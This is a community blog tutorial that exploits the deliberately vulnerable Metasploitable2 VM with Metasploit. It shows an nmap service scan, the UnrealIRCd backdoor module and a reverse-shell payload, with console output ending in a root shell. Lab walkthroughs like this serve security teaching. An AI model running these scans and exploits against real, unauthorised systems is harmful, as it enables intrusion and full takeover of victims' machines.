METASPLOIT/METASPLOITABLE2

March 14, 2016 | Views: 4679

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools.

After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.

To get your IP address you must configure VM on Bridge adapter mode.

eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1

inet addr:192.168.1.4 Bcast:192.168.1.255 Mask:255.255.255.0

So in my case IP address for attack is 192.168.1.4

From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner.

Let s get to it :

To open Metasploit, run the command:

msfconsole

I receive the following:

cowsay++
____________

————
,__,
(oo)____
(__) )
||–|| *

=[ metasploit v4.11.15-dev-8697798 ] + — –=[ 1523 exploits – 887 auxiliary – 260 post ] + — –=[ 436 payloads – 38 encoders – 8 nops ] + — –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Whenever you start up Metasploit, there is a cute little banner which is sometimes an animal saying “metasploit” or an astroids based ASCII art. Regardless of what you see there, the important stuff is below.
Metasploit will print out its version including core and API version, how many exploits, auxiliary, and post modules it has loaded as well as how many payloads, encoders.

From here we can start to enter commands.

Let S look help :

msf > help

Core Commands
=============

Command Description
——- ———–
? Help menu
advanced Displays advanced options for one or more modules
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
info Displays information about one or more modules
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
rename_job Rename a job
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers

Database Backend Commands
=========================

Command Description
——- ———–
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

So we can now see all options available to us. A shortcut for “help” is also a question mark (“?”).
The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.
o start off a pentest, we need to find the machines on the network.
Finding all machines and attack vectors is known as “intelligence gathering” or “enumeration”
To find all targets on our network, we would just run an nmap scan against our subnet.
There are many different options for nmap, including host OS discovery, stealthy scans, tracemaps, and many others.

Okay, now let’s finally start exploiting this machine
As previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of msfconsole we can utilize the database built in to save our nmap scans.
Run this command to insure that our database is connected:

msf > db_status
[*] postgresql connected to metasploit4
msf > db_nmap
[*] Usage: db_nmap [–save | [–help | -h]] [nmap options] msf >

If it spits out an error, then we need to connect our database.

Okay, now let’s finally start exploiting this machine.typr :

db_nmap -v -sS -A [ip-address]

v is “verbose” which means it will output more information for us to the screen.
-sS is the “SYN” or “stealth” scan, which doesn’t create a full connection to the host and is thus “stealthy”. If you want to know more about this check out the nmap man page or other documention.
-A is an all-encompassing option which includes Operating System detection, version detection (like the -sV option), script scanning, and traceroute.

msf > db_nmap -v -sS -A 192.168.1.4
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-11 20:20 CET
[*] Nmap: NSE: Loaded 132 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: Initiating NSE at 20:20
[*] Nmap: Completed NSE at 20:20, 0.00s elapsed
[*] Nmap: Initiating NSE at 20:20
[*] Nmap: Completed NSE at 20:20, 0.03s elapsed
[*] Nmap: Initiating ARP Ping Scan at 20:20
[*] Nmap: Scanning 192.168.1.4 [1 port] [*] Nmap: Completed ARP Ping Scan at 20:20, 0.23s elapsed (1 total hosts)
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 20:20
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 20:20, 0.03s elapsed
[*] Nmap: Initiating SYN Stealth Scan at 20:20
[*] Nmap: Scanning 192.168.1.4 [1000 ports] [*] Nmap: Discovered open port 53/tcp on 192.168.1.4
[*] Nmap: Discovered open port 3306/tcp on 192.168.1.4
[*] Nmap: Discovered open port 25/tcp on 192.168.1.4
[*] Nmap: Discovered open port 21/tcp on 192.168.1.4
[*] Nmap: Discovered open port 22/tcp on 192.168.1.4
[*] Nmap: Discovered open port 139/tcp on 192.168.1.4
[*] Nmap: Discovered open port 23/tcp on 192.168.1.4
[*] Nmap: Discovered open port 111/tcp on 192.168.1.4
[*] Nmap: Discovered open port 80/tcp on 192.168.1.4
[*] Nmap: Discovered open port 445/tcp on 192.168.1.4
[*] Nmap: Discovered open port 5900/tcp on 192.168.1.4
[*] Nmap: Discovered open port 1099/tcp on 192.168.1.4
[*] Nmap: Discovered open port 2121/tcp on 192.168.1.4
[*] Nmap: Discovered open port 513/tcp on 192.168.1.4
[*] Nmap: Discovered open port 514/tcp on 192.168.1.4
[*] Nmap: Discovered open port 512/tcp on 192.168.1.4
[*] Nmap: Discovered open port 6000/tcp on 192.168.1.4
[*] Nmap: Discovered open port 8009/tcp on 192.168.1.4
[*] Nmap: Discovered open port 6667/tcp on 192.168.1.4
[*] Nmap: Discovered open port 2049/tcp on 192.168.1.4
[*] Nmap: Discovered open port 8180/tcp on 192.168.1.4
[*] Nmap: Discovered open port 1524/tcp on 192.168.1.4
[*] Nmap: Discovered open port 5432/tcp on 192.168.1.4
[*] Nmap: Completed SYN Stealth Scan at 20:20, 2.85s elapsed (1000 total ports)
[*] Nmap: Initiating Service scan at 20:20
[*] Nmap: Scanning 23 services on 192.168.1.4
[*] Nmap: Completed Service scan at 20:23, 136.29s elapsed (23 services on 1 host)
[*] Nmap: Initiating OS detection (try #1) against 192.168.1.4
[*] Nmap: NSE: Script scanning 192.168.1.4.
[*] Nmap: Initiating NSE at 20:23
[*] Nmap: Completed NSE at 20:26, 158.57s elapsed
[*] Nmap: Initiating NSE at 20:26
[*] Nmap: Completed NSE at 20:26, 0.16s elapsed
[*] Nmap: Nmap scan report for 192.168.1.4
[*] Nmap: Host is up (0.047s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Public Key type: rsa
[*] Nmap: | Public Key bits: 1024
[*] Nmap: | Signature Algorithm: sha1WithRSAEncryption
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: | Not valid after: 2010-04-16T14:07:45
[*] Nmap: | MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
[*] Nmap: |_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
[*] Nmap: |_ssl-date: 2016-03-11T19:23:22+00:00; -46s from scanner time.
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: | dns-nsid:
[*] Nmap: |_ bind.version: 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 (DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: | program version port/proto service
[*] Nmap: | 100000 2 111/tcp rpcbind
[*] Nmap: | 100000 2 111/udp rpcbind
[*] Nmap: | 100003 2,3,4 2049/tcp nfs
[*] Nmap: | 100003 2,3,4 2049/udp nfs
[*] Nmap: | 100005 1,2,3 35875/udp mountd
[*] Nmap: | 100005 1,2,3 44512/tcp mountd
[*] Nmap: | 100021 1,3,4 50723/tcp nlockmgr
[*] Nmap: | 100021 1,3,4 54154/udp nlockmgr
[*] Nmap: | 100024 1 35197/udp status
[*] Nmap: |_ 100024 1 47457/tcp status
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login
[*] Nmap: 514/tcp open tcpwrapped
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry
[*] Nmap: |_rmi-dumpregistry: Registry listing failed (No return data received from server)
[*] Nmap: 1524/tcp open shell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ccproxy-ftp?
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: | Protocol: 53
[*] Nmap: | Version: .0.51a-3ubuntu5
[*] Nmap: | Thread ID: 8
[*] Nmap: | Capabilities flags: 43564
[*] Nmap: | Some Capabilities: SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, Support41Auth, ConnectWithDatabase, Speaks41ProtocolNew, SupportsTransactions
[*] Nmap: | Status: Autocommit
[*] Nmap: |_ Salt: -6g${cZ|!+TFBVm?1x*c
[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)
[*] Nmap: | vnc-info:
[*] Nmap: | Protocol version: 3.3
[*] Nmap: | Security types:
[*] Nmap: |_ Unknown security type (33554432)
[*] Nmap: 6000/tcp open X11 (access denied)
[*] Nmap: 6667/tcp open irc Unreal ircd
[*] Nmap: 8009/tcp open ajp13?
[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 08:00:27:02:3B:8E (Oracle VirtualBox virtual NIC)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 – 2.6.33
[*] Nmap: Uptime guess: 0.011 days (since Fri Mar 11 20:10:28 2016)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TCP Sequence Prediction: Difficulty=204 (Good luck!)
[*] Nmap: IP ID Sequence Generation: All zeros
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Host script results:
[*] Nmap: | nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (unknown)
[*] Nmap: | Names:
[*] Nmap: | METASPLOITABLE Flags:
[*] Nmap: | METASPLOITABLE Flags:
[*] Nmap: | METASPLOITABLE Flags:
[*] Nmap: | x01x02__MSBROWSE__x02 Flags:
[*] Nmap: | WORKGROUP Flags:
[*] Nmap: | WORKGROUP Flags:
[*] Nmap: |_ WORKGROUP Flags:
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 47.36 ms 192.168.1.4
[*] Nmap: NSE: Script Post-scanning.
[*] Nmap: Initiating NSE at 20:26
[*] Nmap: Completed NSE at 20:26, 0.03s elapsed
[*] Nmap: Initiating NSE at 20:26
[*] Nmap: Completed NSE at 20:26, 0.00s elapsed
[*] Nmap: Read data files from: /usr/bin/../share/nmap
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 326.93 seconds
[*] Nmap: Raw packets sent: 1104 (49.322KB) | Rcvd: 1102 (44.930KB)
msf >

Once you run this, a whole lotta stuff should come out at you. Once the scan is done you might be confused with your results, but I’ll show you how to easily determine your attack vector.

When your database has hosts in it, you can display which ones it has tracked with the “hosts” command.
Mine looks like this right now:

msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
192.168.1.1 64:6e:ea:16:de:98 Linux 2.6.X server
192.168.1.2 Linux 3.X server
192.168.1.4 08:00:27:02:3b:8e Linux 2.6.X server

Pretty cool, right? It has the IP, OS, flavor of OS, MAC, and more!
If we were to run a larger nmap scan, there would be many more hosts listed. This is a great way to keep track of which hosts are which while conducting a pentest.

But how does this help us with our exploitation? Metasploit also has the option to display all services detected by typing “services”. This is my output after scanning the Metasploitable host:

msf > services

Services
========

host port proto name state info
—- —- —– —- —– —
192.168.1.4 2121 tcp ccproxy-ftp open ProFTPD 1.3.1
192.168.1.4 25 tcp smtp open Postfix smtpd
192.168.1.4 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.4 53 tcp domain open ISC BIND 9.4.2
192.168.1.4 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5
192.168.1.4 6667 tcp irc open Unreal ircd
192.168.1.4 23 tcp telnet open Linux telnetd
192.168.1.4 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.1.4 5432 tcp postgresql open PostgreSQL DB 8.3.0 – 8.3.7
192.168.1.4 2049 tcp nfs open 2-4 RPC #100003
192.168.1.4 1524 tcp shell open Metasploitable root shell
192.168.1.4 1099 tcp rmiregistry open GNU Classpath grmiregistry
192.168.1.4 514 tcp tcpwrapped open
192.168.1.4 8009 tcp ajp13 open Apache Jserv Protocol v1.3
192.168.1.4 111 tcp rpcbind open 2 RPC #100000
192.168.1.4 513 tcp login open
192.168.1.4 512 tcp exec open netkit-rsh rexecd
192.168.1.4 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP
192.168.1.4 5900 tcp vnc open VNC protocol 3.3
192.168.1.4 21 tcp ftp open vsftpd 2.3.4
192.168.1.4 6000 tcp x11 open access denied
192.168.1.4 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP

Well that is quite a bit more useful. We can see the IP of the host with which port, protocol, and service is being used. On top of that, since we had version detection on, it displays more information about which version of the service is running.msf > search unreal

We can see port 6667 is running Unreal ircd. Unreal is a server for irc (internet relay chat), and the “d” at the end of ircd stands for “daemon” which means the port is listening for a service in the background.

Metasploit also has an awesome feature to find exploits, scanners, and other modules with the “search” option. We are going to run the following command to see if there’s any modules for Unreal IRC:

msf > search unreal

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/linux/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 “secure” Overflow (Linux)
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
exploit/windows/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 “secure” Overflow (Win32)

To load a module in Metasploit, we use the “use” command followed by the name of the module:

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) >

As we can see, our prompt has changed to show that we are using an exploit module with the name. When we are using the “use” command, you can use “tab completion” which means if you’re stuck, hitting the tab key will either complete the option, or if tapped twice, will display the options (if there are multiple). Most Linux users know this command since it is incredibly useful while moving through a file system or issuing commands quickly.

Now that we have the module loaded, issuing the command “show options” will of course show us the possible options.

msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 6667 yes The target port

Exploit target:

Id Name
— —-
0 Automatic Target

There are only two options possible, and only one target which is automatic since this is only for one operating system. Both the options are required which means the exploit cannot be run without these. We can see the port is already set since IRC servers run on the port 6667 as a normal, but if someone is trying to hide the service on a different port, this can be changed.
To set or change an option, issue the “set” command followed by the option you wish to change and finally the variable you want to change it to, like as follows:

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4
RHOST => 192.168.1.4

Of course you would want to set your host IP to whatever the IP address is of your exploitable machine.

Metasploit has certain “payloads” that we can use to determine what kind of code we want to execute when connecting to the host machine. you can use the “search” command followed by what you are looking for (e.g. unix shell).

msf exploit(unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
—- ————— —- ———–
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4RHOST => 192.168.1.4
msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse_ruby_ssl
PAYLOAD => cmd/unix/reverse_ruby_ssl

Let’s finally exploit this system! The exploit command has certain options such as -j which runs it as a job, or -z which does not interact with the system after exploitation. These can be used in different ways. To view all of them, use the help command followed by what command you need help with (e.g. help exploit).
Running our exploit results in this:

msf exploit(unreal_ircd_3281_backdoor) > exploit -z

[*] Started reverse SSL handler on 192.168.1.2:4444
[*] 192.168.1.4:6667 – Connected to 192.168.1.4:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
[*] 192.168.1.4:6667 – Sending backdoor command…
[*] Exploit completed, but no session was created.

And in the end it does not work :(, but what can you do..maybe i try the diferent expolit or payload..:)
The output i was hoping for will look like this :

msf exploit(unreal_ircd_3281_backdoor) > exploit -z
[*] Started bind handler
[*] Connected to 192.168.1.10:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
[*] Sending backdoor command…
[*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500
[*] Session x created in the background.

We see some output, and most notibly at the bottom “command shell session opened” and “session created in the background”. If we didn’t run this with the -z option and with no payload, the following output would have been produced:

f exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.1.110:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
[*] Sending backdoor command…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo aeuPuvLl90yRmhts;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “aeuPuvLl90yRmhtsrn”
[*] Matching…
[*] A is input…
[*] Command shell session x opened (192.168.1.111:4444 -> 192.168.1.110:49034) at 2012-11-03 23:08:41 -0400

That’s a lot of stuff, but it’s pretty easy to understand. First it connects to the socket (which is an IP and port), and receives back the two following lines. After it receives those, it sends the backdoor command and accepts two connections. Part of the exploit is echoing certain gibberish, which is then written to two sockets. Those sockets are then read and what is received is output. After the backdoor goes through, a command shell is opened and labeled as “session 1”.

Speaking from the the most previous exploit, what we should have is a blank screen. Let’s get back to what you should have done previously since this is just another option in our exploiting phase. Keep in mind when issuing exploits there are numerous ways to get where you need to be, and certain options are better than others.

Now, we have session x created in the background, how do we access it? Of course Metasploit has an awesome command for this, which is “sessions”:

msf exploit(unreal_ircd_3281_backdoor) > sessions
Active sessions
===============
Id Type Information Connection
— —- ———– ———-
x shell unix 192.168.1.111:51923 -> 192.168.1.110:4444 (192.168.1.110)

Of course the IP addresses will be different than yours since we do not have the exact same network, but it should display your exploited system’s IP address. The Id will also be the session # that you created, and is variable to how many sessions you have created.

Finally how we interact with this session is to issue the following command:

msf exploit(unreal_ircd_3281_backdoor) > sessions -i x
[*] Starting interaction with x…
pwd
/etc/unreal
whoami
root
id
uid=0(root) gid=0(root)

So we can see, we interact with the session numbered x, then it brings us to that session which is a command prompt in the exploited machine. Running pwd displays our current working directory, whoami displays which user we have access as, and id displays our uid and gid permissions.

so thank you for reading my first post on CYBRAY OPEN.
.

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
2 Comments
  1. Thank you so much!

  2. This text was originally written by the old blog from the time when it was hard to get good material for learning, respect for old school

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 335 / December 14, 2019
How do I Get MTA Certified?
Views: 927 / December 12, 2019
How much does your PAM software really cost?
Views: 1380 / December 10, 2019
How Do I Get into Android Development?
Views: 1758 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel